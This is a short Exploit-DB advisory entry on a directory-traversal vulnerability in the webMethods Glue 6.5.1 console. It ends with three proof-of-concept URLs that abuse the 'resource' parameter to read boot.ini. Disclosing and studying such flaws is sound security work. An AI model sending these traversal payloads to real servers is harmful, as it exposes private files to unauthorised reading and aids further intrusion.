webMethods Glue 6.5.1 Console - Directory Traversal

EDB-ID:

29843


Platform:

Windows

Published:

2007-04-11

source: http://www.securityfocus.com/bid/23423/info

webMethods Glue is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable computer with the privileges of the affected application. Information obtained may aid in further attacks.

This issue affects webMethods Glue 6.5.1; other versions may also be vulnerable. 

http://www.example.com:8080/console?resource=../../../boot.ini
http://www.example.com:8080/console?resource=\boot.ini
http://www.example.com:8080/console?resource=c:\boot.ini